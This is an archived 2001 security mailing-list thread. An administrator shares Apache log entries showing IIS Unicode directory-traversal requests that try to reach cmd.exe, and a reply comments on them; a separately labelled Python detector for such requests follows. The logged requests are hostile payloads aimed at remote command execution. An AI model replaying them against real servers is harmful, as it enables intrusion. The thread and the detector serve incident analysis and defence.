[Dshield] New one?

Tony Maro tonym at nlisc.com
Wed Oct 17 14:36:58 GMT 2001


Oh crap - looks like it's trying the standard directory traversal with a
twist, BUT... what's significant is that it looks like it's coming from a
Winblows 98 box!

If there's a new bug infecting 98 that does this that's gonna be one massive
DOS attack.

-----Original Message-----
From: Martin Mueller [mailto:mueller at webpartner.de] 
Sent: Wednesday, October 17, 2001 8:05 AM
To: dshield at dshield.org
Subject: [Dshield] New one?

Hi all,

I found these log entries today on an Apache virtual web server of my company.
Sorry, the lines are very long, but all different...

Is this a new "Code Red" or something?
It does not look like the "normal" CR or Nimda to me.

The "attacking IP" is located in Brazil (if it is the real one :-) ); we are in
Germany.

Best regards,

Martin Mueller
----------------------------------------
Webpartner Kommunikationsdienste GmbH
Metzstrasse 14b
81667 Muenchen

Tel: 089/480 88 89-0
Fax: 089/480 88 89-9

mueller at webpartner.de
http://www.webpartner.de
----------------------------------------
Clicked yet? http://www.urlpartner.de
Manage favorites online
A project of Webpartner GmbH




200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET /msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\ HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
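
A defender-side check for the pattern in the log entries above, added here as an example and not part of either post: it percent-decodes the request path, folds overlong UTF-8 forms such as %c0%af (an overlong encoding of "/") back to ASCII, and reports whether the result contains ".." segments. The function names and the second sample line are assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache combined log format, matched up to the status code.
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) ')

def fold_overlong(raw):
    """Replace overlong 2- and 3-byte UTF-8 forms of ASCII characters with the
    ASCII byte they stand for. Returns (folded_bytes, number_of_overlong_forms)."""
    out, hits, i = bytearray(), 0, 0
    while i < len(raw):
        b, rest = raw[i], raw[i + 1:i + 3]
        if b in (0xC0, 0xC1) and rest[:1] and rest[0] & 0xC0 == 0x80:
            # C0/C1 lead bytes are never valid UTF-8; they can only encode 0x00-0x7F.
            out.append(((b & 0x01) << 6) | (rest[0] & 0x3F))
            hits, i = hits + 1, i + 2
        elif (b == 0xE0 and len(rest) == 2 and rest[0] in (0x80, 0x81)
              and rest[1] & 0xC0 == 0x80):
            # E0 80/81 xx is the 3-byte overlong form of the same ASCII range.
            out.append(((rest[0] & 0x01) << 6) | (rest[1] & 0x3F))
            hits, i = hits + 1, i + 3
        else:
            out.append(b)
            i += 1
    return bytes(out), hits

def inspect_line(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m['target'].split('?', 1)[0]          # drop the query string
    folded, hits = fold_overlong(unquote_to_bytes(path))
    segments = re.split(rb'[/\\]', folded)       # both separators count on Windows
    return {'host': m['host'], 'status': int(m['status']), 'overlong': hits,
            'traversal': b'..' in segments, 'path': folded.decode('latin-1')}

# Constructed sample input: the first entry from the post rejoined onto one line,
# plus an ordinary request from a documentation address for contrast.
SAMPLE = [
    '200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET /msadc/' + '..%c0%af' * 8
    + r'/winnt/system32/cmd.exe?/c%20dir%20c:\ HTTP/1.1" 404 336 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"',
    '192.0.2.10 - - [17/Oct/2001:08:11:02 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == '__main__':
    for entry in SAMPLE:
        print(inspect_line(entry))
```

A 404 status on a flagged line, as in the entries posted here, means the server did not serve the requested path; the overlong count is worth alerting on by itself because legitimate clients do not send these byte sequences.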



